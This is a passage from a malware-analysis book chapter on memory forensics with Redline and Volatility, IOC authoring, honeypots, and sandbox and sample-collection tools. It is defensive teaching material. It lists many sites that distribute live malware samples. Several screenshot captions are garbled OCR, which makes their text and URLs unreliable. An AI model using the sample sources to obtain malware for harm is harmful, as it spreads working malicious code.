the collected data. However, beyond memory 
analysis and visualization, it does not perform 
data recovery options, is not multi-platform, and 
doesn't work for mobile devices natively as of 
yet. 


Installation is a breeze! You execute the 
downloaded Redline.msi package from 
http://www.mandiant.com/resources/downloads/ 
and ensure that you have .NET 4 installed. The 
default path for installation is C:\Program 
Files (x86\Redline\. 


Redline works using three collector types, 
which are scripts to collect data from the 
potentially compromised system (you can also 
use Redline on a virtual machine; however, the 
performance suffers). All three modes require a 
memory image to work with. 


You are recommended to use an external 
portable drive to save the redline collector 
package to, while configuring the Standard and 
Comprehensive Redline Collectors. 


e« The Standard Collector collects the minimum amount of 
data to complete the analysis and generate an MRI score. 


« The Comprehensive Collector gathers the maximum 
amount of data and is recommended if you want to 
perform full analysis or are only getting a single 
opportunity to do so on your target system. 


e« The IOC Search Collector seeks to find selected IOCs 
only and it filters out the rest. This procedure can be 
performed with the other two modes as well and is not an 
isolated process. 


On choosing any one of the collectors, you get to 
select from a plethora of options relating to 
memory, disk, system, network, persistence 
mechanisms/tasks, and so on. These options will 
compile down to your script settings that will be 
deployed in the external USB drive for memory 
acquisition and analysis. You are advised to 
check the Acquire Memory Image checkbox for 
more accuracy. 
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You begin by executing the 
RunRedlineAudit.bat script. You require 
Administrator privileges, which Redline manages 
on its own most of the time. You can connect the 
USB inside a virtual machine, disconnect it from 
the host machine, and start the script to work on 
the vm guest memory. This will be a bit slow, but 
it certainly works. The other quicker method is to 
simply pause the virtual machine and feed the 
path of the snapshot file (. vmem) to Redline via 
Analyze a saved memory file. Before you 
commence with your analysis and acquisition, 
you can download the m-whiteList text file that 
contains the MD5 hashes of the whitelisted 
applications that will be ignored in the analysis. 
You can add your own by simply writing an MD5 
string every new line. This can be done via the 
Options menu. This menu holds some very 
useful configurations and it is recommended that 
you spend some time understanding the various 
options you have, even as default works fine. 


General Configuration Whitelist Management 


Default File Locations Current MDS Whitelist: Export 
Default Script Options Last Updated: 5/24/2012 120000 AM Total MD5s: 676 964 
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For instance, mutants are a Windows kernel 
based mechanism to create named objects for 
synchronization purposes. Often, a malware will 
create a particular mutex string in order to 
ensure that only one running instance of itself 
can be executed. You can ameliorate the handles 
checking by using the list at: 
http://hexacorn.com/examples/2014-12- 




















General Configuration Suspicious Handles 



































Default File Locations Allows you to specify a handle name or handle regex string that when matched for the specified handle 
— type will generate an MRI Ht with the user supplied description field, For each suspicious handle, you 
Dealt eit Options may optionally provide a process name that must also match to generate an MRI Hit, leaving this field 
Whitelist Management blank will search any process for the suspicious handle, 
Timeline Configuration Suspicious Handles: ori 7 
Tag Configuration ee 
jon f Handle: }\voqa.id 
MRI Rules Configuration “cmd.exe “aa 
General - / emdexe ie 
Expected Arguments a Description: 
Expected Users he v3.06 Process has a known Poison hy mutant 
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The Default File Locations must be excluded 
from the anti-virus product scans. When 
performing acquisitions or extracting process 
memory (as a final zip file in the default locations 
path with password safe) from the session file, 
these regions will be used so they must not be 
interfered with. 


General Configuration Default File Locations 


) 


fault Fle Location Default Unsafe Acquisition Staging Location: Open Folder 
Default Script Options C\Users\user\AppData\Local\Temp\ UNSAFE 


Whilst Management Note: this directory shouldbe marked as ignored by any antivirus monitoring software. It should also be a 
location that will not casually be browsed to where o user could accidently activate potential malware, As 
added secunty, ths folder should also be configured using Software Restriction Policies (or AppLocker if on 
Tag Configuration Windows 7) to block the ability to eecute files from this rectory. 


Timeline Configuration 


MRI Rules Configuration 











So, let us commence the analysis of the loaded 
sessions. Inside the scripts directory are 
sequentially numbered sessions where you look 
for the file with a .mans extension. Open it and 
explore the different views in Redline. 


In the following image, the Malware Risk Index for 
Dark Seoul is 93, which, on a scale of 0 -100, we 
can confidently say is malicious. You also see a 
pie graph of the negative and positive points 
that identify the suspicious processes and why so 
as a consolidated summary. The tabs at the 
bottom provide specific kinds of details, such as 
Strings, Sections, Ports, and so on, as shown 
in the next image: 


Details Duplicates Sections | — Handles Ports | 


Strings File Image Load Events DNS Lookup Events 
Network Events File Write Events Registry Key Events Tags and Comments 








The MRI score for Dark Seoul: 





i Home» Host Poses» Ful Detaled lomabon 


ud Co 





4 Pree 
Handles 
Wana ects 
Shing 
Pots 
Hierarchical roceses 


Der Madules 
Deve Tine 
Hols 


Tinelne 
Tags Comments 


Acquin Fihry 








v DarkSeou! DB4BBDC3OATSABBOTADSBISASE2S15C4.eve 


Process Detalls 


Userane, 
Path (Documents and Seng Adrnsratr estoy 
Pant CULYDHGENE (18) 
Pant res Pah 
"CAs and Sting Aint Dest Daun DRABBOCREATEARROADME SASK SCA! 
Stut Tine SEIN UNSSSND 
Kernel Time Eped: (2000) 
Uber Time lap C00) 
5, SS SHIT TL HS 


Malware Rsk nde Hts 


Bonet 


:] Thess hs exelent pres aes pe cag thal iat umaped ele pei age adi cre eau, iy 





Name Men Sci 


Brpieties 0 
ee 
Biooritixos ts 








Hest (Ces elated Det |Duphales VA Report Seti | Hrs | Pots Stings mae Lod Eves} ONS Loup Eres Neto ets Fett aay ets Tagg and Comments 








Extracting memory regions of this process (right- 
click the process name and choose to acquire the 
memory): 
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The resulting file is a password-protected 
memory dump Zip file. 


Thereafter, the rest is all about how you look at 
the data and infer your analysis details from it. 


http://www.openioc.org/ is an industry 
collaborative effort at standardizing the malware 
IOC communications and this initiative is widely 
supported, including the support by Redline. 
Mandiant released the |OCe (editor) tool to work 
with the lOC-based xml files for generating IOC 
based reports. You can download the sample 
lIOCs from the site to get a feel for it. Remember 
to rename the extensions to .ioc from .xml if 
your browser appends it, otherwise lOCe will not 


be able to parse it. Once you get the hang of the 
format, you can start with creating your own and 
combine Boolean operators with malware specific 
characteristics. 
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File Extension contains evt 
Process lane ig explorer.exe 
‘Bventlog ID is 6009 
[ser Nane is Administrator 
Service Mane is Trkllks 
Registry Path contains \DosDevices\C: 
Bort Local Port is 446 
Volume Drive Letter is C 
~ Disk Name is \\.\PhysicalDrived 
Hook Hooked Module is disk.sys 
Driver Name is disk.sys 
aN 

Fide Nane is sene.dll 

L File Digital Signature Exists is true 


( 


Loaded IOCs:6 





You can choose from a quite extensive list of 
individual elements that can comprise of an IOC 
signature. 
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Registitem >| Email References 
Routentrytem >| Email Retum Path 
Servieltem >| Email Sender 
Snort >| Email Subject 
; ! | Systeminfoltem >| Email Threacinder 

















nated 0.7 Unsaved OCs ie at 


To make use of IOC in reporting, click the 1OC 
Reports tab towards the bottom left, create a 
new report by feeding the directory of the IOC 
repository (the folder where you keep all .ioc 
files), and start the analysis. 


Redline makes malware memory forensics 
accessible and takes the guesswork and 
configuration out of the game. It is quick and 
easy to use, quite robust, and business ready in 
terms of intelligence gathering and reporting. 
However, it is still limited in other ways, as hinted 
at earlier, and you may have to use more 


detailed and extensible tools such as Volatility 
Framework for memory forensics. 


Volatility 


Art of Memory Forensics, Michael Ligh, John Wiley 
& Sons is an excellent introduction to this tool. 
Find it at 
https://github.com/volatilityfoundation/volatility. 


The general commands reference can be found 
at 
https://code.google.com/p/volatility/wiki/Comman 
dReference. 


More interestingly malware-specific commands 
are compiled at 
https://code.google.com/p/volatility/wiki/Comman 
dReferenceMal23. 


« Malfind: Find the hidden and injected code 


e Yarascan: Scan the process or kernel memory with Yara 
signatures 


e svcscan: Scan for Windows services 
e Idrmodules: Detect unlinked DLLs 
e impscan: Scan for calls to imported functions 


« apihooks: Detect API hooks in the process and kernel 
memory 


e idt: Display Interrupt Descriptor Table 

e gdt: Display Global Descriptor Table 

« threads: Investigate ETHREAD and KTHREAD 

« callbacks: Print system-wide notification routines 

- driverirp: Driver IRP hook detection 

e devicetree: Show device tree 

e psxview: Find hidden processes with various process 

listings 

Running the standalone version is recommended 
as you do not have to gather and configure 
plugin scripts as it is fully self-contained. 





To pass a memory snapshot (.vmem) or a memory 
image, use the —f switch and then the 
commands. For instance, 


volatility-2.3.1.standalone.exe —f <path 
to image> imageinfo 


This is not very different from Redline in terms of 
the actual work done by you, as all of the 
commands are one liners, much like a point and 
click interface. The scripts implement the 
algorithms developed to extract and identify the 
memory artifacts and hence the bulk of the work 
is already automated for you. This can certainly 
be a timesaver. From Chapter 3, Performing a 
Séance Session, try to feed the developed yara 
signatures into Volatility using the yarascan 


command, assuming the Yara signatures are in 
the current path, and you have a memory 
snapshot of Dark Seoul paused inside OllyDbg. 
Set a breakpoint towards the onset of the 
payload address (refer to Chapter 3, Performing a 
Séance Session) and let it break in OllyDbg. 
Thereafter, just press pause in the VM controls 
and take note of the location and file name of the 
snapshot file (*.vmem). 


volatility-2.3.1.standalone.exe -f 
<snapshot path> yarascan -- 
yara-file=ds.yar.txt 


You can expect an output as shown in the 
following image: 








Malware intelligence 


Just knowing one particular skill and being 
efficient is a thing of the past. As malware and 
the threat landscape itself is polymorphic in 
concept and design, the approach is be more 
than the archaic methodology of creating 
signatures. To know the threat actors and gather 
intelligence, a multi-pronged approach of the 
three essential grounds that have to be covered 
are: 


e Surveillance and monitoring 
« Analyses and visualization 


e Sandboxing and reporting 


We will cover some tools and as to how they 
relate towards coming towards the goals one 
step closer: 


- Modern Honey Network: This can be found at 
http://threatstream.github.io/mhn/ and 
https://github.com/threatstream/mhn 


« Malware Control Monitor: This can be found at 
https://github.com/marcoramilli/malcontrol 


e« Canari: This can be found at 
https://github.com/allfro/canari 


« Malcom: This can be found at 
https://github.com/tomchop/malcom 


e Cuckoo Sandbox: This can be found at 
https://github.com/cuckoobox/cuckoo 


- Malware samples crawler: This can be found at 
http://maltrieve.org/ 
To get an idea of how effective these tools 
already are, head to www.malwr.com for 
sandboxing and reporting. 


Create an account and start submitting samples 
and researching the existing analysis reports. 


The interface is very intuitive and easy to use. 


You need to use a Linux distro for the rest of the 
tools in the preceding list. They mostly use 
Python, but the dependencies and libraries will 
be more conveniently installed rather than trying 
to port everything to a Windows/OSX platform. 
Set up an account in Github and install git in 
your Linux distro. 


Monitoring and visualization 


MHN - Multi-snort and honeypot sensor 
management, uses a network of VMs, small 
footprint SNORT installations, stealthy dionaeaas, 
and a centralized server for management 


Modern Honey Network uses a set of sensors to 
gather network-related attack data. It performs 
analysis on the attacks and maps the attack 
parameters to a world map view while 
maintaining copious amounts of information 
about the attack, thus making it very visual and 
intuitive to work with Honeypots. This schematic 
is taken from http://threatstream.github.io/mhn/. 
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It is a good idea to use a public cloud provider for 
server access that can be configured as a 
Honeypot. The IP address given by the provider 
will be used for MHN server access later on. 


The MHN server installation commands are listed 
next (to be run as root): 


$ cd /opt/ 

$ git clone 
https://github.com/threatstream/mhn.git 
$ cd mhn/scripts/ 


sudo 
sudo 
sudo 
sudo 


+ PP ER tA 


4 


./install_hpfeeds.sh 

./install_mnemosyne.sh 
./install_ honeymap.sh 
./install_mhnserver.sh 


Following is the list of supported Honeypots: 





« Suricata 
- Dionaea 
e Conpot 
« Kippo 

e Amun 

- Glastopf 
e Wordpot 
e ShockPot 
- pOf 


e Elastichoney 


Use your login details during installation 
(username and password) and log into the MHN 
server using your web browser and the dedicated 
server provider IP address: 





Log In 
Ema 
Welcome to the Modern 
Honeypot Netiorksenier 


Forgot password? 


Modem Honeynt Frameworks an opensource projet by QrHREAT STREAM 





Log in and check the Attack Stats, which 
provides a priority list of the attack parameters - 
IP addresses, ports, and attack signatures: 


MHN Server Map  Deoly —Altaoks — Payloeds = Rules * = Sensors y Chats 


Attack Stats 


Attacks inthe last 24 hours: 497 


TOP 5 Attacker IPs: 


1, lj 122.224.6.150 (79 attacks) 
2. [| 103.43,94.30 (4 attacks) 
3, 6 61.183,1266 (23 attacks) 
4, 5 71.188,75.36 (15 attacks) 
5, ip 61.240.144.66(44 attacks) 


TOP 5 Attacked ports: 


1, 3306 (86 times) 
2, 25(57 times) 
3, 24 (34 times) 
4, 22(32times) 
§, 1433 (23 times) 


TOP 5 Attacks Sienatures; 


1, ET POLICY Suspicious inbound to my SQL port 3306 (23 times) 

2. ETDROP Dshield Block Listed Source group 4 (18 times) 

4, ET POLICY Suspicious inbound to MSSQL port 1433 (14 times) 

4, GPL SNMP public access udp (5 times) 

5, ETDROP Spamhaus DROP Listed Traffic Inbound group 4 (3 times) 





To drill down further and gather more intel on the 
attacks, the Attacks Report view provides a set of 
search filters for all the recorded attacks, with 
pertinent details such as the source and 





destination ports, the network protocol, the 
honeypot sensor type, the origin of attack, and 
the timestamps. 
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To get a better idea of the sensors being 
deployed, navigate to the Sensors view to 
gather stats or configure them: 


MHN Server Map Deny Atacks Payload Peg» Seo 





Name Hostname =P honeypot UID Attacks 
y= We 49210211199 dagen Gabe fe ST SgdnnenT 64 
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Finally, the Map view gives the geographic 
context. The bottom pane is scrollable and 
displays the log of attacks with relevant details: 
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In order to deploy more Honeypots, navigate to 
the Deploy view: 


MHN Server Map Y=) 0) 0) a ANU (0 Paylo 


Select Script 


New script 





New script 

Ubuntu - Suricata 
Ubuntu - Amun 
Raspberry Pi - Dionaea 
Ubuntu - Glastopf 


Ubuntu - Dionaea 
Ubuntu - pOf 
Ubuntu - Kippo 
Ubuntu - Conpot 
Ubuntu - Shockpot 
Ubuntu - Wordpot 

















You can then use the command shown for quick 
installation: 





Select Script 


Ubuntu - Snort 





D 


wget "http:// /api/script/?textztruedscript ide?" -0 deploy.sh && sudo bash deploy, sh 
http:// p7B64PhK 


cD 


ploy Command 


Deploy Script 


Name 





Find out more at 
https://www.threatstream.com/blog/mhn-modern- 
honey-network. 


MHN provides a simplified approach to deploying 
Honeypots and at this point in your installation, 
you have surveillance, monitoring, and 
visualization taken care of. 


You can learn more about honeypots at: 
https://www.honeynet.org/node/315 


http://old.honeynet.org/tools/index.htm! and 
https://www.honeynet.org/project 





Malware Control Monitor 


From the site description - "Gathering open data 
from malware analysis websites and visualize 
threat impact with this comprehensive Malware 
Control Monitor project". Installation is 
straightforward and you have to install a few 
dependencies-mongodb, git and Nodejs, geta 
API Key for MapBox (https://www.mapbox.com/), 
post installation, type: 


git clone 
git@github.com:marcoramilli/malcontrol.gi 
it 

cd malcontrol.git 

npm install 


and then; 


grunt 
npm start 


then go to localhost: 8080 
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Malware Control! Monitor project 
depicting the malware threats across 
the globe 


Malcontrol scrapes the following services and 
builds reports on each threat, exposed as a 
clickable url for the report: 


- Malwr 

e Phishtank 

e Urlquery 

- Virscan 

e Webinspector 


e Domainlist 


« malcOde 


e vxvault 


The following is an excerpt from the site 
description - "A background node scrapes 
websites to grab malware informations and fills 
up a mongodb database. An API node serves API 
useful to frontend layer." 


A world map displays the locations of all the 
geolocalized malwares and threats detected by 
the scrapers, using markers. Every single marker 
has the shape of the logo of the scraped source 
of origin. Markers can be grouped, zoom map to 
see detailed information. Some useful charts are 
displayed on the right side showing all the 
information supplied by the backend's API. 
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A view of geo-localized malwares and 
threats detected by the scrapers 


Malcom - Malware Communication Analyzer 
(shown in the preceding image) is useful for 
network traffic visual analysis and cross- 
referencing that data with the malware sources; 
and Canari employs custom-made Maltego 
transforms that help in links based analysis of 
malware, penetration testing, and anything that 
requires deeper analysis. 


With Malcom (fully written in Python - see the 
installation steps on 
https://github.com/tomchop/malcom), you can: 


detect central command and control (C&C) servers 


understand peer-to-peer networks 


observe DNS fast-flux infrastructures 


quickly determine if a network artifact is 'known-bad' 
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From the description on the site - "The aim of 
Malcom is to make malware analysis and intel 
gathering faster by providing a human-readable 
version of network traffic originating from a given 
host or network. Convert network traffic 
information to actionable intelligence faster." 





Sandboxing and reporting 


Gathering malware samples is a tedious job and 
any tool that helps alleviate this task is worth 
using. While you can make use of the malware 
sharing sites and repositories, aggregating it all 
is not always a very convenient process. Install 
dependencies a priori - sudo apt-get install 
python-dev. Maltrieve supports Cuckoo analysis 
as well. The commands are self explanatory, after 
you run Maltrieve as python maltrieve. py for 
the Python installation or just maltrieve on the 
console for normal installation. 


usage: maltrieve [-h] [-p PROXY] [-d DUMPDIR] [-] LOGFILE] [-x] [-v] [- 


optional arguments: 
“h, --help show this help message and exit 
“p PROXY, --proxy PROXY 
Define HTTP proxy as address :port 
~d DUMPDIR, --dumpdir DUMPDIR 
Define dump directory for retrieved files 
-] LOGFILE, --logfile LOGFILE 
Define file for logging progress 
~-Vxcage Dump the files to a VxCage instance 
--viper Dump the files to a Viper instance 
--crits Dump the file and domain to a CRITs instance 
--cuckoo Enable Cuckoo analysis 
, ~*Sort_mme Sort files by MIME type 





Maltrieve crawls the following sites: 


e MalcOde: This can be found at http://malcOde.com/rss 


- Malware Domain List: This can be found at 
http://www.malwaredomainlist.com/hostslist/mdl.xml 


« Malware URLs: This can be found at 
http://malwareurls.joxeankoret.com/normal.txt 


¢ VX Vault: http://vxvault.siri-urz.net/URL_List. php 
- URLquery: http://urlquery.net/ 


« CleanMxX: http://support.clean-mx.de/clean- 
mx/xmlviruses.php? 


- ZeusTracker: https://zeustracker.abuse.ch/monitor. php? 
urlfeed=binaries 


A nice and maintained list of sites for malware 
collection can be found at: 
http://www.kernelmode.info/forum/viewtopic.php? 
f=16&t=308- 


e http://support.clean-mx.de/clean-mx/viruses.php 
e http://malshare.com/ (registration required) 
- http://malcOde.com/database/ 


e https://zeustracker.abuse.ch/monitor. php? 
browse=binaries 


e http://www.sacour.cn/showmal.asp?month=8year=2012 
- http://malwaredb.malekal.com/ (registration required) 


- http://blog.urlvoid.com/new-list-of-dangerous-websites-to- 
avoid 


- http://www.scumware.org 
e http://www.threatlog.com 


e http://adminus.net (For sample requests, use contact 
email adminus.xs(at)gmail(dot)com) 


e http://jsunpack.jeek.org/?list=1 (RSS feed) 
e http://www.malwareurl.com/ (free registration required) 


e http://www.offensivecomputing.net/ (malware repository, 
free registration required to download) 


e http://vxvault.siri-urz.net/ViriList.php (password required, 
unknown at present) 


e http://vxvault.siri-urz.net/URL_List.php 


- http://contagiodump.blogspot.com/2011/03/take-sample- 
leave-sample-mobile-malware.html (Mobile malware 
samples) 


e http://virussign.com/downloads.html (registration 
required) 


e http://www.nothink.org/viruswatch.php 
e http://dashke.blogspot.com/ 


e http://malware.l|u/ (registration required to download) 


e http://www.nictasoft.com/ace/malware-urls/ 

e http://virusshare.com/ 

- http://labs.sucuri.net/ 

- http://freelist.virussign.com/freelist/ 

- http://malwareurls.joxeankoret.com/normal.txt 

e http://malwared.malwaremustdie.org/index.php?page=1 
- http://ytisf.github.io/theZoo/ 

e http://amtrckr.info/ 


https://www.virustotal.com/ provides a monthly 
paid premium service for malware intelligence 
that allows sample downloading and regular 
malware feeds and reports. They only cater to 
organizations or companies and you can explore 
this asset once you have gone over the other 
more accessible avenues. 


Joe sandbox at http://www.joesecurity.org/ from 
Switzerland is an excellent commercial sandbox 
with one of the most detailed sandbox reports 
(generic signatures, classifications, and threat 
scores) for all the executable file types and 
documents for Windows XP onwards, as well as 
android application packages and Mac OSX 
mach-o binaries. Its technical accuracy and 
diversity sets it apart from its competition with 
an excellent feature set comprising of hybrid 
code analysis (code analysis based on dynamic 
memory dumps), execution graph analysis, 
adaptive execution, extensive behavior signature 
set, Yara rule generator, and cookbooks 
(automated custom configuration of the analysis 
procedure using scripts). This is highly 
recommended. 


Cuckoo Sandbox at 
http://www.cuckoosandbox.org/ is behind the 
malware analysis site www.malwr.com. Cuckoo is 


described as an open source automated malware 
analysis system. 


Cuckoo features: 


Retrieves files from remote URLs and analyze them 
Traces relevant API calls for behavioral analysis 
Recursively monitors newly spawned processes 
Dumps generated network traffic 

Runs concurrent analysis on multiple machines 


Supports custom analysis package based on Autolt3 
scripting 


Intercepts downloaded and deleted files 


Takes screenshots during runtime 


Formats: 


Generic Windows executables 
DLL files 

PDF documents 

Microsoft Office documents 
URLs and HTML files 

PHP scripts 

CPL files 

Visual Basic (VB) scripts 
ZIP files 

Java JAR 

Python files 


Almost anything else 


Installation can be a little tricky on Linux if you 
are new to it, though once done it works like a 
charm. Since this requires the core Cuckoo 
daemon component cuckoo. py to run in the 
Linux host and the analyzer agent. py in the VM 
with Windows XP to be installed, you cannot 
make this into a VM based sandbox without 
some serious tweaking, aS you cannot run a VM 
guest inside a VM guest. You can use Qemu, 
Bochs, or Linux KVM for this purpose, but then 


Summary 


In this chapter, you started with configuring your 
Linux installation for network traffic analysis, 
after which you had a better look at Xor-based 
obfuscation and related tools. Thereafter, you 
analyzed a malicious web page and got a good 
look at the overall workflow, approach, tools such 
as Malzilla and Firebug to perform script based 
debugging, shellcode extraction, and conversion 
and analysis using simple and already available 
tools such as the hex editor and shellcode-2-exe 
converter. You got to know about the USC2 
encoding and why the NULL characters are 
eliminated from the exploit codes, which is this 
chapter was a download-execute type of exploit 
also known as a drive-by download. You were 
quickly introduced to bytecode analysis tools and 
a rapid fire round on document analysis tools. 
Thereafter, you took a detailed overview of 
Redline from Mandiant as a tool to perform 
malware memory forensics and its various 
options and features. You were also introduced to 
the OpenlOC standard and the IlOCe editor tool. 
Moving on, you were introduced to malware 
intelligence related concepts and tools - for 
malware sample collection, honeypots, 
monitoring tools, visualization tools and analyses 
sandboxes that will certainly aid you in gathering 
as much information about malware in all its 
various forms. 


Recapitulation: At this point, you have a sound 
understanding of the computing concepts 
required to get you started in malware analysis 
for the Windows platform. You are well 
acquainted with the assembly programming 


concepts, conventions, and tools for Windows 
and the VC++ 2008 development environment. 
You understand the toolchain for converting 
source code to binary code and how binary code 
can be reverse engineered to get a pretty good 
representation of its design and functionality. 
Things like calling conventions, registers, call 
stack, inline assembler, lib file generation is not 
new to you. You have been introduced to the 
malware analysts tool set and got a good 
overview of IDA Pro - the industry standard 
diassembler/debugger. Thereafter, you 
proceeded with indepth malware analysis of a 
real world destructive malware (MBRkiller- 
DarkSeoul) and understood what malware 
analysts do and how they approach reverse 
engineering, keeping in mind that you can be as 
creative or resourceful as you want. You then 
worked on kernel debugging and Windows 
internals concepts to further solidify your 
understanding of the analysis process. Finally, 
you dealt with web based malware (JS/Dropper) 
and exploits (various CVEs) and got to know how 
you might be able to approach such threats in 
your own analysis. To conclude, you were pointed 
in the direction of malware intelligence and its 
significance in the current climate. This sets the 
baseline, which you absolutely must be 
comfortable with to progress with more complex 
threats. | do hope you got the best out of it. 
While the book has page limits, you should have 
no problem exploring the bounds of each 
discussed topic and begin and/or continue your 
journey into malware analysis mastery. How far 
you take it is up to your hard work and 
dedication. Let us all make the world a safer 
place to be in - to the best of our abilities! 
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